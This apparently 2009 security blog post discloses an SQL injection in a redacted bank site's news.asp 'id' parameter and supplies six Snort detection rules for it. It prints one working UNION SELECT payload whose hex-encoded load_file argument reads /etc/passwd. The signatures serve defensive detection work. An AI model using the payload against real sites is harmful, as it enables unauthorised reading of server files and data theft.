Credit for Exploit: Rohit Bansal
Exploit:
http://www.BankXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.com/news.asp?id=4+and+1=2+union+all+select+1,2,3,load_file
(0x2f6574632f706173737764),5,6,7--
Vulnerable Variable: id=
Vulnerable File Frame: /news.asp?
SQL: UNION SELECT
Countermeasure:
Use the above combination to ensure that your snort signature prevents the attack.
Example(s) on EmergingThreats Format:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+SELECT.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UNION SELECT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id INSERT"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+INSERT.+INTO/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id DELETE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+DELETE.+FROM/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id ASCII"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+ASCII\(.+SELECT/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE news.asp SQL Injection Attempt -- news.asp id UPDATE"; flow:established,to_server; uricontent:"/news.asp?"; nocase; uricontent:"id="; nocase; pcre:"/.+UPDATE.+SET/Ui"; classtype:web-application-attack; reference:cve,; reference:url,www.; sid:200XXXXX; rev:1;)
Disclosure: EvilFingers neither guarantee's the exploit nor the signature.
Contact us at Contact.Fingers @ gmail.com for any further questions.
- EF
Sunday, January 4, 2009
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment